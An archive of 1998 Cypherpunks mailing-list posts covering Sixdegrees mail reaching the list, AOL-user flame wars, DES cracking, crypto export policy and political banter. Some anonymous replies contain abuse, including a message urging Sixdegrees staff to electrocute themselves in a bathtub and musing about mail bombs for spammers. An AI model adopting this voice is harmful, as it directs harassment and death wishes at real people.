From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Wed, 16 Sep 1998 01:52:07 +0800
To: christopher.barkley@srcm.com
Subject: Re: Harald Fragner
Message-ID: <a56c37f4f3d17f8f97dc0d5f448246bf@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, John Scott Porterfield wrote:

>
> How do I get off this list!!!
>
> Bob
>
>

You remove yourself from this list the same way you subscribed, but since
that is such a stupid question and you are obviously a very intelligent
man, I conclude that you meant something else.

By running your badly punctuated sentence through the AOLhole-translator,
we get either: "How do I get off?" or "How do I get off on this list?"

To get off, you may consider seeing a sex therapist. They are more
qualified to assist you in that area. 

To get off on this list is more difficult. We Cypherpunks aren't into that
kind of thing. However, we understand that Christopher Barkley
<christopher.barkley@srcm.com> is in the market for a friend, so you may 
want to see if you can pair up. You've both spammed the list, so you 
already have something in common! 

In the mean time, please refrain from shooting jizz all over the list like
you and the Sixdegrees lamers have been doing. Someone may slip and hurt
themselves and it always leaves a sticky mess that's just hell on the carpet.

Regards, Voices, Harald, Woof, moans, and whatever.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 15 Sep 1998 17:54:08 +0800
To: cypherpunks@Algebra.COM
Subject: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
Message-ID: <Pine.LNX.3.96.980916065055.6321A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain


http://www.cnn.com/TECH/computing/9809/15/internet.hit.list.ap/index.html

I remember when this page was posted.  It was INCREDIBLY obvious it was
bogus.  either the feds involved are incredibly clueless or they are just
trying to make an example of anyone implementing anything close to an AP
server.

They are afraid. They are very afraid.


alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 00:33:12 +0800
To: cypherpunks@toad.com
Subject: Re: Regards
Message-ID: <199809160528.HAA02807@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Witty retort to the flames :) I like this one.




---Christopher Barkley <christopher.barkley@srcm.com> wrote:
>
> Apparently, I just spammed your list a couple of days ago; my
> apologies.  Some zithead listed your email address in the Six Degrees
> networking service and starting asking people to be his contacts.  One
> can only hope his fate is neither swift nor pretty.  (I bear some of
the
> blame; I should have recognized the email address since I have several
> friends on the list.)
> 
> At any rate, my thanks to Tom Perry for his polite explanation of the
> situation.
> 
> As for the REST of you who responded, you have my sympathies.  With
any
> luck, they'll get that thorazine prescription refilled soon.
> 
> Cheerio,
> Christopher
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 00:44:14 +0800
To: cypherpunks@toad.com
Subject: Re: Democracy...
Message-ID: <199809160536.HAA03287@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Separation of church and state was established by jefferson not as a
quote from the constitution but as a summary of the religious parts of
it.  It was written in a letter to baptists in massachusets.  He also
sent a copy of it to his postmaster general and attorney general for
proofreading to make sure it was a legal summary and correct.  You can
find this info on the internet.




---Jaeger <Jaeger@hempseed.com> wrote:
>
> hey, would you care to show us where "seperation of church and
state" is
> to be found in the constitution/bill of rights?  absolute right and
> wrong is not a religious belief (necessarily)..  your religious
beliefs
> do not affect the nature of reality.  there are absolute truths by
> necessity...  see, there is NO WAY that there could not be.  Because
if
> there were no absolute truths, then that would mean that NOTHING is
> absolute.  That statement in itself is an absolute.  now, as for
> absolute truths regarding the president, there may or may not be any
as
> far as most people are concerned.  people always seem to make an
> exception for people who agree with them...  in order to be an
effective
> president, however, one must uphold the very basis of this country, by
> upholding the law.  Clinton perjured himself, obstructed justice, and
> tampered with witnesses in a grand jury investigation (which was
> incidentally <sp?> being conducted by a man who was praised just
months
> earlier as unbiased and very qualified for the job).  The man is
> supposed to be the figurehead for our system of gov't.  If he cannot
> follow the law, then he is not fit for the office.
> 
> Jaeger
> 
> > Ever heard of seperation of church and state? Democracy? the
rights of
> >
> > the individual?  While you certainly have the right to practice your
> > religion in what ever manner you so choose demanding that everyone
> > else
> > does, or that the president of the us of ais subject to you PERSONAL
> > faith decisions is outragous
> >
> > Vivek Vaidya
> >
> > ______________________________________________________
> > Get Your Private, Free Email at http://www.hotmail.com
> 
> 
> 
> 

==
"The same thing we do every night Pinkey,
 try to take over the WORLD!"
                          - The brain
_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AIMSX@aol.com
Date: Wed, 16 Sep 1998 06:47:11 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <a899df24.35ffa3e7@aol.com>
MIME-Version: 1.0
Content-Type: text/plain



In a message dated 98-09-15 23:06:12 EDT, you write:

> By the way, the sentence I quoted above is what is known as a question. In
> English, you use a question mark for those. 

I know... I noticed that just when I hit the send button.  Hmm, where you ever
an English teacher... maybe named Mrs. Braly?

Anyway... I don't type like an idiot, as I HAVE seen.

I also rarely ever reply to someone, so I forget all about the quotes when I
do, I am sorry for that mistake.  Hopefully it is corrected to everyone on the
internet's liking above.

I think (but not sure) that you are trying to put words in my mouth with the
following statement: 

> but since AOL _is_ the Internet

Well, I never said anything like that.  Actually, I only like a few things
about AOL, but I know it is NOT _the_ Internet.  I also know that NO ISP is
_the_ Internet.  It is a collection of protocols, etc.  Next time, don't put
words in my mouth.  

Someone once said (I can't remember who exactly),
The greatest threat to manipulators are the people who think for themselves.
So, I really don't CARE what you say about me, or too me.  It really has no
meaning to me.  

Oh, and maybe it will give you some wierd joy to know that I _am_ switching
ISP's soon, to dfw.net, with SunOS shell account =)

Well, enough of replying to your insults, or what I took to be insults.  I
need to read a little.

Bye.
-The person that has been labeled a typical AOL k00l d00d

P.S.  Grow up... quit berating people because of an ISP that they MAY not even
have had a choice on... did you ever think of that?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Wed, 16 Sep 1998 01:00:05 +0800
To: cypherpunks@toad.com
Subject: Re: Larry Gilbert, AOLers, and the Hyper-real flamer
Message-ID: <199809160556.HAA04756@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998 AIMSX@aol.com wrote:

> 
> Obviously you have a very high opinion of yourself and a low opinion of people
> who use AOL.  Contrary to popular belief, there are a few intelligent people
> on AOL, but it looks as if you are too egotistical to realize that.

You're right.

We have very high opinions of ourselves. We have low opinions of people
who use AOL because they're typically scum, spammers, or idiots. You even
admit this by saying "there are a FEW intelligent people on AOL." They're
also paying $20/month for a shitty service with a bad reputation.

If you don't like the stereotype, get your fellow AOLers to get a
clue and reverse it which will probably take years if it's possible at
all, or if you're actually an intelligent AOLer, go get an ISP which
isn't synonymous with manure.

Personally, I'm figuring very, very few AOL users who publish actively to
the Internet have a clue. The traffic on this list just over the last
month backs that up. The reputation AOL has is deserved, and there is a
definate pattern of stupidity from AOL.

In the future quote so we know what you're talking about, and don't use
the "flick off the Internet" quoting style, either.

> Have you ever thought to look at your own mistakes before you publicize
> everyone else's to the world?  

I'm not sending requests for band stickers to cryptography lists. I'm not
sending messages to cryptography lists which read "how u do that" with no
punctuation. I'm not asking members of cryptography lists to sign me up to
receive the news by email every morning. I'm not replying to things while
not quoting, or by using some quoting system which was designed by AOL for
the purpose of pissing off non-AOLers.

I'm not publishing web pages which are unreadable without the latest
shovelware from Microsoft or Netscape, and which shoots the finger
otherwise. 

I'm not saying "AOL is the Internet," and I'm not signing up with a
service because they send me a free mirror or coaster or because I'm too
lazy to learn to do anything other than point and click.

> Are you just suffering from some sort of
> dillusion of grandeur - thinking you are better than everyone else. 

Not everyone else, but infinitely better than the average kool d00d,
AOLer, or webber, and infinitely better than the president who the
"average" American elected.

By the way, the sentence I quoted above is what is known as a question. In
English, you use a question mark for those.

> Things
> like this are what many wars were started over, I am so happy the internet
> (hopefully) won't start a war in the real world.

I won't have anything to do with it, but I'm fully expecting for some new
Unabomber to appear within the next few years. Instead of targeting
technology centers like the Unabomber did, this guy will mail bombs to
spammers, people who send "how u do that" to lists, etc. I, thankfully, am
morally constrained enough to never do anything like that, but I would bet
that there is somebody out there who isn't. 

>From what AOL users send to the Internet from their service, one can
easily conclude that AOL is a haven for wannabes, lamers, and k00l D00dz
\/\/h0 tiPE l1|<E Th1s, but since AOL _is_ the Internet and is so filled
with intelligent people, I suggest you go back there and leave all of us
who are just deluded into thinking we're using the Internet and who only
think we know about our professions and hobbies.

Yet another AnonMonger. (How many are there now? Man.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 15 Sep 1998 19:08:16 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
In-Reply-To: <199809160016.TAA01658@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980916080811.6520A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Wed, 16 Sep 1998 06:53:53 -0700 (PDT)
> > From: Alan Olsen <alan@clueserver.org>
> > Subject: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
> 
> > http://www.cnn.com/TECH/computing/9809/15/internet.hit.list.ap/index.html
> 
> How come only the IRS is listed as related web sites?...

Becuase they got Jim to sign over the patents for AP.  They want to use it
for "collections".

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alan@clueserver.org>
Date: Tue, 15 Sep 1998 19:10:21 +0800
To: Jim Choate <ravage@EINSTEIN.ssz.com>
Subject: Re: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
In-Reply-To: <199809160016.TAA01658@einstein.ssz.com>
Message-ID: <Pine.LNX.3.96.980916081000.6526A-100000@clueserver.org>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 15 Sep 1998, Jim Choate wrote:

> 
> Forwarded message:
> 
> > Date: Wed, 16 Sep 1998 06:53:53 -0700 (PDT)
> > From: Alan Olsen <alan@clueserver.org>
> > Subject: CNN - Investigators find "assassination" page on the Web - September 15, 1998 (fwd)
> 
> > http://www.cnn.com/TECH/computing/9809/15/internet.hit.list.ap/index.html

BTW, the Oregonian (local Portland, OR paper has an expanded version of
the article.  If I can get time I will type it in. (It is in the 9/15/1998
morning edition on the last page of the Metro section.)

alan@ctrl-alt-del.com | Note to AOL users: for a quick shortcut to reply
Alan Olsen            | to my mail, just hit the ctrl, alt and del keys.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 16 Sep 1998 10:57:53 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [NYT] Bell-South charging access fees for phone-over-Internet
In-Reply-To: <3.0.5.32.19980914104601.008b0a10@idiom.com>
Message-ID: <v04011707b2255fe32ddf@[139.167.130.247]>
MIME-Version: 1.0
Content-Type: text/plain



At 1:46 PM -0400 on 9/14/98, bill.stewart@pobox.com wrote:


> The company has written
> to a half-dozen Internet service providers in its region saying
> that in November, BellSouth will start levying access fees for
> voice conversations the Internet companies transmit.

Bingo. A hole big enough to drive cryptography through...

Crank up your PGPFones, folks.

Or, maybe we just need ipsec?

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Wed, 16 Sep 1998 08:31:53 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Where are the people...
Message-ID: <199809161356.IAA05725@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



...

likely to effect their Safety and Happiness.  Prudence, indeed, 
will dictate that Governments long established should not be 
changed for light and transient Causes; and accordingly all 
Experience hath shewn, that Mankind are more disposed to suffer, 
while evils are sufferable, than to right themselves by 
abolishing the Forms to which they are accustomed.  But when a 

...



    ____________________________________________________________________

                            The seeker is a finder.

                                     Ancient Persian Proverb

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Wed, 16 Sep 1998 08:22:26 +0800
To: cypherpunks@toad.com
Subject: Crypto Deals
Message-ID: <199809161316.JAA27937@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



News of easing US crypto limits sounds like the pr-fluff
put out in the summer for easing controls only for financial
institutions -- BXA is scheduled to release the rule
for that about now (originally set to be "near Labor Day"). 

If the news is about this rule, it may allow a few more 
"reputable institutions" to get the privilege traditionally extended 
to banks, so long as longstanding cooperation with
government is assured.

There's a report out of France on the government's issue of
a paper on crypto policy that reaffirms GAK for electronic
commerce with zero protection of privacy:

   http://jya.com/fr-gak.htm

There will probably be more such papers issued as international
cooperation to control encryption is codified in accordance
with the Wassenaar Arrangement and whatever secret
agreements Aron and others have concluded. 

The US version will probably come out gradually as global 
agreements are firmed up, Congress is briefed, and US agencies 
are satisfied that export holes in other countries have been closed.
Then watch for domestic clampdown on encryption, as Cohen and 
others have warned must be done to protect the populace from
too much freedom.

The secret deals among governments to share technology for information
security and electronic surveillance in return for global controls must be 
wonderful reads of duplicity and disinformation, among the participants
in the classified parts, and among the populace in the public versions.

On a related topic, weakness of DES, the ANSI X9 committee handling
cryptography has circulated a draft paper on what banks should do in 
response to recent successful cracks of DES:

   http://jya.com/destran.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mok-Kong Shen <mok-kong.shen@stud.uni-muenchen.de>
Date: Wed, 16 Sep 1998 02:38:36 +0800
To: cypherpunks@cyberpass.net
Subject: Re: The DES Analytic Crack Project
In-Reply-To: <199809151742.KAA12178@zendia.mentat.com>
Message-ID: <35FF6B68.41B863BB@stud.uni-muenchen.de>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly wrote:
> 
> In the early 1980's I started trying this approach.  I did the
> back-of-the-envelope estimate and realized it was too big, but
> I thought it worth trying, since if there were a back door in
> DES it might manifest itself by a massive collapse in the complexity
> of these expressions.  I didn't get far enough into it to decide one
> way or the other, since I didn't have a good tool for reducing the
> expressions to minimal form.

As far as I know Boolean minimization has been one of the central
themes of people doing circuit design from the beginning. I should
be surprised if there are spectacular breakthroughs recently.

M. K. Shen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 16 Sep 1998 12:10:27 +0800
To: Mark Salamon <mark@sixdegrees.com>
Subject: Re: A personal response to your email to sixdegrees
In-Reply-To: <35FFD638.DB6920D3@sixdegrees.com>
Message-ID: <Pine.GSO.3.95.980916100702.25985L-100000@well.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark, trust me on this: remove all five cypherpunks addresses from your
lists.

Really.

-Declan


On Wed, 16 Sep 1998, Mark Salamon wrote:

> (I was not sure which email address to send this to, as the return
> address was:  nobody@replay.com.  I also do not know who to address this
> email to.)
> 
> I am the WHOIS contact at sixdegrees you sent this email to, and since
> this is a peronal reply to your email, it is certainly NOT spam and I
> would appreciate it if you would take the time to read it and respond.
> 
> I am very confused by your email.  I understand that you do not wish to
> receive emails from sixdegrees, but it is very easy to solve this
> problem.  If anyone ever sponsors you for sixdegrees, simply reply to
> the email and put the word "remove" in the header.  (This is pretty
> standard stuff across the Internet, as I am sure you are aware.)  If
> that occurs, in the future we will not send emails to the email address
> that received the original email from us.
> 
> Unfortunately, if you have many email addresses (as it appears, from the
> bottom of your email), the only way for us to remove each is to have a
> sixdegrees email go to each of these email address accounts and then
> received a "remove" reply to each of these emails.  (We have in our
> records references to 5 different cypherpunks email addresses: 
> @toad.com, @cypherpunks.net, @cypherpunks.org, @algebra.com, and
> @ssz.com.  If you wish for us not to contact you again at any of these
> addresses, we will need to confirm that you in fact control these email
> addresses.  The best way for you to do this is to send an email to
> cancel@sixdegrees.com, and ask to have these email addresses removed. 
> We will then send a reply to each email address you listed, asking you
> to confirm that you in fact control those email addresses and wish to
> have them removed.  Once we receive your confirmation, we will adjust
> our records so you receive no further emails from us to those email
> addresses.  For example, if I receive an email from you to this email, I
> will assume that you control the @toad.com email address and I will have
> that removed.)
> 
> What is confusing to me is that the email you received from sixdegrees
> (with the subject:  Harald Fragner) is one that would be sent ONLY to a
> CONFIRMED sixdegrees user.  That means that once upon a time, whether
> you remember or not, you joined sixdegrees (as have over 1,000,000
> people to date).  It also appears that you listed Harald Fragner as a
> contact, and he recently denied his sixdegrees relationship with you. 
> Thus, it is not surprising that you would receive emails from
> sixdegrees, as you had registered for our service at one time.  (I
> assume that the email address you used to register with sixdegrees was
> the @toad.com one.)
> 
> sixdegrees is purely a voluntary service, and if you do not want to
> participate in it, then we are happy to accommodate you.  We do not send
> out spam and take great efforts to ensure that no one receives unwanted
> email from us.
> 
> I look forward to receiving your reply to this email.
> 
> Mark Salamon
> General Counsel
> MacroView Communications Corp.
> 
> 
> 
> Anonymous wrote:
> > 
> > On Tue, 15 Sep 1998, the shitheads at sixdegrees spammed the Cypherpunks
> > list with:
> > 
> > > Just a quick update from sixdegrees(tm). Unfortunately Harald
> > > Fragner (harald@fragner.net) asked not to be listed as your
> > > contact with sixdegrees.
> > >
> > > We also wanted to make sure you were aware that you currently
> > > have no other confirmed contacts, so it will be hard for you to
> > > have a productive sixdegrees experience. As you probably know,
> > > without any confirmed contacts, you won't get any results from our
> > > networking searches.
> > >
> > > So, we just wanted to recommend that you head over to
> > > http://www.sixdegrees.com , log-in, and go to MY CONTACTS
> > > to list additional relationships.
> > >
> > >
> > > ====================================================================
> > > PLEASE NOTE: All replies to this address are processed by a computer.
> > > If you have any problems, questions or requests send an e-mail to
> > > issues@sixdegrees.com and someone will get back to you as soon as
> > > possible.
> > > ====================================================================
> > >
> > >
> > > E.DB.BRESP.3
> > >
> > >
> > 
> > Just a quick update from the Cypherpunks(tm). Fortunately, we don't want
> > anything to do with your worthless, pathetic, spamming selves. We don't
> > want to be your friends and, in fact, we'd prefer it if you would crawl
> > under a rock and die because that seems to be the only way you'll stop
> > spamming our mailing list.
> > 
> > We also wanted to make sure that you were aware that you currently have no
> > confirmed redeeming qualities, so it will be hard for you to be taken
> > seriously by those of us who do have a clue. As you probably know, without
> > any redeeming qualities, you will get lots of results every time you send
> > out a batch of spam.
> > 
> > So, we just wanted to recommend that you head on over to your bathtub with
> > the rest of your coworkers, fill it up, jump in together, and then drop in
> > a large, plugged-in, turned-on electric heater into the water and remain
> > in until you stop twitching and cardiac activity ceases.
> > 
> > C.LU.EFULS.2000
> > 
> > You people don't give a fuck how much excrement you shoot all over the
> > net, so long as you let people know of your pathetic, worthless,
> > disgusting service. If you can get somebody's mailing list to relay your
> > shit for you, so much the better, because then you don't have to
> > personally send it.
> > 
> > Sorry, but I've had it with Sixdegrees. I've personally told you idiots
> > very nicely what the Cypherpunks list is, and asked you nicely to stop
> > spamming it. I've personally told you a method to keep people from
> > submitting these addresses to your worthless spam haven. Other people have
> > done the same thing. You haven't fixed it, indicating that you don't care.
> > I'm no longer asking nicely.
> > 
> > A copy is being sent to your technical contact, on the assumption that
> > maybe he is a little more responsible, though I doubt it.
> > 
> > -- The Cypherpunks List <cypherpunks@toad.com,
> > cypherpunks@*.cyberpass.net, cypherpunks@*.ssz.com,
> > cypherpunks@algebra.com, and others>
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Richard.Bragg@ssa.co.uk
Date: Wed, 16 Sep 1998 04:18:05 +0800
To: mmotyka@lsil.com
Subject: Re: Democracy...
Message-ID: <80256681.0031C8CB.00@seunt002e.ssa.co.uk>
MIME-Version: 1.0
Content-Type: text/plain








mmotyka@lsil.com on 16/09/98 00:48:25

Please respond to mmotyka@lsil.com

To:   cypherpunks@toad.com
cc:
Subject:  Re: Democracy...




>Vivek Vaidya wrote:
> Ever heard of seperation of church and state? Democracy? the rights of
> the individual?  While you certainly have the right to practice your
> religion in what ever manner you so choose demanding that everyone > else
> does, or that the president of the us of ais subject to you PERSONAL
> faith decisions is outragous
>
> Vivek Vaidya
>
But whoever said I'm in the US?

Where did I make any such demand?

However, if you believe in something to be life changing and beneficial to
      both the idividual and society you'll want or

be compelled to "pass it on".  I can't and do not wish to force any one to
      any point of view, that's pointless.

What I wanted to illustrate is that there are absolutes, to say there are
      no obsolutes is in itself an absolute and so is self

defeating.  We must have absolutes.  These are often agreed on and applied
      through the legal systems but they are still there.

Thus, when examining the behaviour of people in power we apply rules to
      encompass that power ie you can go so far and

no further.  When we are talking about national leaders in the west that do
      represent a wide range of views this can become

more difficult but there still must be a yard stick agreed.



PS If ol' Bill claims to be a Christian then he himself is setting the yard
      stick against we should measure him.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "X" <xasper8d@lobo.net>
Date: Wed, 16 Sep 1998 11:24:25 +0800
To: <cypherpunks@cyberpass.net>
Subject: Just what we need...
In-Reply-To: <v04011707b2255fe32ddf@[139.167.130.247]>
Message-ID: <000601bde18e$11900a20$862580d0@ibm>
MIME-Version: 1.0
Content-Type: text/plain



I know I'm new here, so pardon the long post if you will, but this came to
my attention...

Jesse Berst says:

This is another in my occasional series about Natural Born Killers (NBKs) --
products, services or sites with the genetic potential to become a "killer
application." An NBK is not a recommendation to buy. Or even, as in the case
of Alexa, a recommendation to use a free product. An NBK nomination is a
recommendation to study a product for the good ideas it contains.
And Alexa stuffs a lot of good ideas into a small toolbar that appears at
the bottom of your browser. This toolbar links back to the company's massive
database, which archives most public Web sites. It also tracks anonymous
usage patterns, so it can analyze what people really do on the Web.
(This is handy because we really need to know what people do on the Web.
For Gosh sakes, if we didn't know what you were doing, that'd be downright
depressing!  Then how could we pigeonhole you and market to you and we all
know, the Web won't be successful without some good, clean, marketing!)
The toolbar goes along with you as you surf,
(nothing makes me more comfortable than to have a nice tracking device
stapled in my flanks)
offering site statistics and a variety of helpful tools. For instance, if
you get a File Not Found error, you can retrieve a previous version of the
page from the Alexa archive. You can see site ratings from other Alexa users
(and vote on sites yourself). You even get a direct link to a Web-based
dictionary, thesaurus and encyclopedia.
(Compromise your right to privacy and we'll give you
chump-change-virtual-trinkets!)
PC Magazine says "those with more Internet savvy will get the most out of
Alexa." I would go even further. Alexa is less valuable to mainstream
users -- it's intended audience -- than it is to Internet insiders like you.
I say that because of three things you can get from Alexa:
(1 An optional shoulder-mounted Duo-Cam(r) which simultaneously watches your
monitor and tracks retinal placement so marketers will REALLY know what
you're looking at:
2, A FREE newsletter with important messages from our sponsors who you have
indicated interest in by allowing your retina to focus on their banner ad
.gif: and
3, AnalProbe Y2k(tm) that monitors, in conjunction with the Duo-Cam(r), your
sphincter tightness when certain images are placed on your monitor.  This
device has been known to become addictive to certain members of the
Log-Cabin-Republican party and certain NOW founding members, so extended use
is recommended only with caution.  However, the data we are able to collect
has proven to be 100% accurate shit, so our sponsors feel it is a beneficial
device.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Stu Green <stugreen@realtime.net>
Date: Wed, 16 Sep 1998 10:16:13 +0800
To: alg <cypherpunks@einstein.ssz.com
Subject: Clinton to relax crypto rules
Message-ID: <35FFD7AE.659BAB26@realtime.net>
MIME-Version: 1.0
Content-Type: text/plain






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Neels Kriek" <kriek@bigfoot.com>
Date: Wed, 16 Sep 1998 10:37:17 +0800
To: "cypherpunks" <cypherpunks@cyberpass.net>
Subject: Fw: WARRANTY CARD ON PURCHASED GOVERNMENT OFFICIAL[tm]
Message-ID: <002c01bde187$e8188ec0$a7060cd1@alien>
MIME-Version: 1.0
Content-Type: text/plain




-----Original Message-----
From: Gernot Lachner <glachner@iafrica.com>
Newsgroups: za.humour
Date: Monday, September 14, 1998 10:57
Subject: WARRANTY CARD ON PURCHASED GOVERNMENT OFFICIAL[tm]


>
>Dear Special Interest,
>
>Congratulations on the purchase of your genuine Government Official[tm].
>
>With regular maintenance your Government Official[tm] should provide you
>with a lifetime of sweetheart deals, insider information, preferential
>legislation and other fine services.
>
>Before you begin using your product, we would appreciate it if you would
>take the time to fill out this customer service card. This information will
>not be sold to any other party, and will be used solely to aid us in better
>fulfilling your future needs in political influence.
>
>1. Which of our fine products did you buy?
>
>__ President
>__ Vice-President
>__ Minister
>__ Governor
>__ Mayor
>__ Cabinet Secretary - Commerce
>__ Cabinet Secretary - Other
>__ Other Elected Official (please specify)
>__ Other Appointed Official (please specify)
>
>2. How did you hear about your Government Official[tm]?
>Please check all that apply.
>
>__ TV ad.
>__ Magazine/newspaper ad.
>__ Shared jail cell with.
>__ Former law partner of.
>__ Unindicted co-conspirator with.
>__ Kwazulu-Natal crony of.
>__ Procured for.
>__ Related to.
>__ Recommended by lobbyist.
>__ Recommended by organized crime figure.
>__ Frequently mentioned in conspiracy theories. (On Internet.)
>__ Frequently mentioned in conspiracy theories. (Elsewhere.)
>__ Spoke at fundraiser at my temple.
>__ Solicited bribe from me.
>__ Attempted to seduce me.
>
>3. How do you expect to use your Government Official[tm]?
>    (Please check all that apply.)
>
>__ Obtain lucrative government contracts.
>__ Have my prejudices turned into law.
>__ Obtain diplomatic concessions.
>__ Obtain trade concessions.
>__ Have embargo lifted from own nation/ally.
>__ Have embargo imposed on enemy/rival nation/religious infidels.
>__ Obtain patronage job for self/spouse/mistress.
>__ Forestall military action against self/allies.
>__ Instigate military action against internal enemies/aggressors/targets
>      for  future conquest.
>__ Impede criminal/civil investigation of self/associates/spouse.
>__ Obtain pardon for self/associates/spouse.
>__ Inflict punitive legislation on class enemies/rivals/hated ethnic
>     groups.
>__ Inflict punitive regulation on business competitors/environmental
>     exploiters/capitalist pigs.
>
>4. What factors influenced your purchase?
>    (Please check all that apply.)
>
>__ Performance of currently owned model.
>__ Reputation.
>__ Price.
>__ Appearance.
>__ Party affiliation.
>__ Professed beliefs of Government Official[tm].
>__ Actual beliefs of Government Official[tm].
>__ Orders from boss/superior officer/foreign government.
>__ Blackmail.
>__ Celebrity endorsement.
>
>5. Is this product intended as a replacement for a currently owned
>    Government Official[tm]? ______
>
>If you answered "yes," please indicate your reason(s) for changing models.
>
>__ Excessive operating / maintenance costs.
>__ Needs have grown beyond capacity of current model.
>__ Defect in current model:
>__ Dead.
>__ Senile.
>__ Indicted.
>__ Convicted.
>__ Resigned in disgrace.
>__ Switched parties / beliefs.
>__ Outbribed by competing interest.
>
>Thank you for your valuable time.
>
>Always remember: in choosing a Government Official[tm] you have chosen
>the best politician that money can buy.
>
>
>credits go to someone from atj.
>--
>sciathn leathair ~..~
>"the mortality rate amongst humans is 100%"
>
>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Wed, 16 Sep 1998 13:04:39 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: Democracy...
Message-ID: <33CCFE438B9DD01192E800A024C84A1928467E@mossbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Someone wrote:
>Religion has nothing to do with 'faith' or 'Churches'

What definition of "religion" are you using. I am very hard pressed to
find single definition that does not involve *faith*, although I have
yet to find a good etymological dictionary on the Internet (anyone know
of one?). You are correct that religion need not have anything to do
with church.

>A man may be an atheist and be religious.

Greek: a- (without) + [theos (god) + ismos (practice or doctrine)]

Unless you can show me a religion that does not involve a god or gods,
and although etymologically unjustified I would claim one that does not
involve *faith*, then I would say you could NOT be both an atheist and
religious. Agnostic perhaps, but not an atheist. You can be
contradictory and hypocritical and claim you are many things, but we are
talking about a coherent philosophy.

You can be both spiritual and an atheist. Spirituality does not require
faith in any external mystical element or being.

Jaeger wrote:
> notice the wording in the first amendment...it only restricts gov't
> restrictions on religion.

What part of "Congress shall make no law respecting an establishment of
religion" didn't you understand?

As with most the constitution, however, this is theory, not practice. In
practice there are many laws and case precedence establishing and
preferring certain religious practices, particularly the institution of
marriage.

Jim wrote:
> The 1st prevents the government from regulating religion, even to the 
> point of having the authority to define what a religion is.

I agree, but clearly they have. Particularly all the IRS code involving
certain exemptions for religious organizations and individuals. Like I
said above, theory versus practice, we are essentially no longer living
under the constitution.

	Matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Salamon <mark@sixdegrees.com>
Date: Wed, 16 Sep 1998 10:21:41 +0800
To: cypherpunks@toad.com
Subject: A personal response to your email to sixdegrees
In-Reply-To: <199809152257.AAA05080@replay.com>
Message-ID: <35FFD638.DB6920D3@sixdegrees.com>
MIME-Version: 1.0
